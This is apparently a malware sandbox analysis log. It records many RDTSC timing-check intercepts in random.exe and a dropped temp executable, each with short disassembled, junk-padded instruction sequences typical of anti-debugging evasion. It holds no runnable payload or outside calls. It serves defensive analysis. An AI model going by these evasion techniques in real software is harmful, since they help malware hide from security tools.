Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5730C50 second address: 5730C60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8D38B7BC8Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5730C60 second address: 5730C64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5730CB2 second address: 5730CB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5730D1C second address: 5730D22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5730D22 second address: 5730D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5730D26 second address: 5730D2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5730D2A second address: 5730D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 pushad 0x0000000a jmp 00007F8D38B7BC95h 0x0000000f mov ecx, 6057B267h 0x00000014 popad 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F8D38B7BC94h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5730D68 second address: 5730D6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5730D6C second address: 5730D72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5730D72 second address: 5730D83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8D38E5637Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 65039F second address: 6503A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7C4A9F second address: 7C4AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 pop ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8D38E5637Dh 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7C4AB9 second address: 7C4ABD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7C4ABD second address: 7C4AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7C4AC6 second address: 7C4AE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 jmp 00007F8D38B7BC92h 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7AFA7D second address: 7AFA83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7C3A92 second address: 7C3AA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push ecx 0x00000007 jl 00007F8D38B7BC8Ch 0x0000000d jnp 00007F8D38B7BC86h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7C3AA9 second address: 7C3AAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7C3D57 second address: 7C3D88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8D38B7BC95h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jl 00007F8D38B7BC88h 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 pop eax 0x00000019 je 00007F8D38B7BC86h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7C4037 second address: 7C403D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7C41AC second address: 7C41B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7C41B2 second address: 7C41C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7C41C1 second address: 7C41C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7C4344 second address: 7C434A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7C434A second address: 7C4350 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7C4350 second address: 7C4384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8D38E5637Bh 0x0000000b jmp 00007F8D38E56388h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007F8D38E5638Dh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7C4384 second address: 7C439F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8D38B7BC91h 0x00000009 push esi 0x0000000a push esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7C439F second address: 7C43B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38E5637Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7C43B3 second address: 7C43B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7C43B7 second address: 7C43BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7C5CF1 second address: 7C5D49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38B7BC91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F8D38B7BC88h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 pushad 0x00000025 mov bx, si 0x00000028 mov esi, dword ptr [ebp+122D391Fh] 0x0000002e popad 0x0000002f push 00000000h 0x00000031 mov cx, dx 0x00000034 mov esi, dword ptr [ebp+122D3AF3h] 0x0000003a push B93A3949h 0x0000003f jl 00007F8D38B7BC94h 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7C5D49 second address: 7C5D4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7C5D4D second address: 7C5DBF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 add dword ptr [esp], 46C5C737h 0x0000000d mov ch, bl 0x0000000f push 00000003h 0x00000011 sub esi, 696E0E82h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007F8D38B7BC88h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 mov edi, eax 0x00000035 push 00000003h 0x00000037 mov edi, ebx 0x00000039 push A1B9FA4Ah 0x0000003e je 00007F8D38B7BC92h 0x00000044 jmp 00007F8D38B7BC8Ch 0x00000049 add dword ptr [esp], 1E4605B6h 0x00000050 mov ecx, dword ptr [ebp+122D3B87h] 0x00000056 lea ebx, dword ptr [ebp+12449BABh] 0x0000005c mov ecx, dword ptr [ebp+122D37CEh] 0x00000062 xchg eax, ebx 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 popad 0x00000068 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7C5F39 second address: 7C5F44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F8D38E56376h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7C6050 second address: 7C6055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7C6055 second address: 7C605A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7C605A second address: 7C6087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8D38B7BC97h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007F8D38B7BC8Ch 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7C6087 second address: 7C60CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38E56383h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F8D38E56381h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push ecx 0x00000015 pushad 0x00000016 push esi 0x00000017 pop esi 0x00000018 push eax 0x00000019 pop eax 0x0000001a popad 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F8D38E5637Ch 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7C60CF second address: 7C6135 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8D38B7BC88h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b jmp 00007F8D38B7BC8Ah 0x00000010 push 00000003h 0x00000012 adc cl, 00000036h 0x00000015 push 00000000h 0x00000017 mov edi, 69946404h 0x0000001c push 00000003h 0x0000001e movsx ecx, di 0x00000021 pushad 0x00000022 mov dword ptr [ebp+122D308Eh], esi 0x00000028 sbb si, BA74h 0x0000002d popad 0x0000002e call 00007F8D38B7BC89h 0x00000033 jnl 00007F8D38B7BC8Eh 0x00000039 jp 00007F8D38B7BC88h 0x0000003f push eax 0x00000040 pushad 0x00000041 push ebx 0x00000042 jno 00007F8D38B7BC86h 0x00000048 pop ebx 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007F8D38B7BC8Eh 0x00000050 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7C6135 second address: 7C6139 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7C6139 second address: 7C614A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7C614A second address: 7C6150 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7AAC41 second address: 7AAC47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7AAC47 second address: 7AAC51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7AAC51 second address: 7AAC62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8D38B7BC8Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7AAC62 second address: 7AAC7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38E56385h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7E4DA4 second address: 7E4DAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7E4DAA second address: 7E4DC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8D38E56385h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7E558D second address: 7E5591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7E5591 second address: 7E559B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8D38E56376h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7E559B second address: 7E55B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F8D38B7BC94h 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7E55B7 second address: 7E55BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7E55BF second address: 7E55C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7E55C3 second address: 7E55FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8D38E56387h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F8D38E56385h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7E5776 second address: 7E577A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7DE06B second address: 7DE06F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7DE06F second address: 7DE094 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F8D38B7BC98h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7DE094 second address: 7DE098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7DE098 second address: 7DE0D6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8D38B7BC93h 0x0000000c jmp 00007F8D38B7BC95h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jnp 00007F8D38B7BC86h 0x0000001a jnl 00007F8D38B7BC86h 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7DE0D6 second address: 7DE0E9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F8D38E5637Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7E6636 second address: 7E6657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jc 00007F8D38B7BC92h 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F8D38B7BC86h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7E6657 second address: 7E665B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7E6D88 second address: 7E6D93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8D38B7BC86h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7EB225 second address: 7EB22F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8D38E56376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7EB22F second address: 7EB24C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jmp 00007F8D38B7BC94h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7ED80D second address: 7ED814 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7EDA32 second address: 7EDA44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7EDA44 second address: 7EDA48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7EDA48 second address: 7EDA7E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c je 00007F8D38B7BC8Ch 0x00000012 jbe 00007F8D38B7BC86h 0x00000018 jmp 00007F8D38B7BC91h 0x0000001d popad 0x0000001e mov eax, dword ptr [eax] 0x00000020 push eax 0x00000021 push edx 0x00000022 jng 00007F8D38B7BC8Ch 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7EDA7E second address: 7EDA82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7EDA82 second address: 7EDAA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8D38B7BC96h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7EEEFD second address: 7EEF03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7EEF03 second address: 7EEF0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7AE0B6 second address: 7AE0C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jp 00007F8D38E56376h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7F4A9A second address: 7F4A9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7F544D second address: 7F5453 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7F5453 second address: 7F548C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38B7BC98h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 7188BDD5h 0x00000012 xor edi, 50969AF1h 0x00000018 call 00007F8D38B7BC89h 0x0000001d push ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7F548C second address: 7F5490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7F5490 second address: 7F54A0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8D38B7BC86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7F63E0 second address: 7F63E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
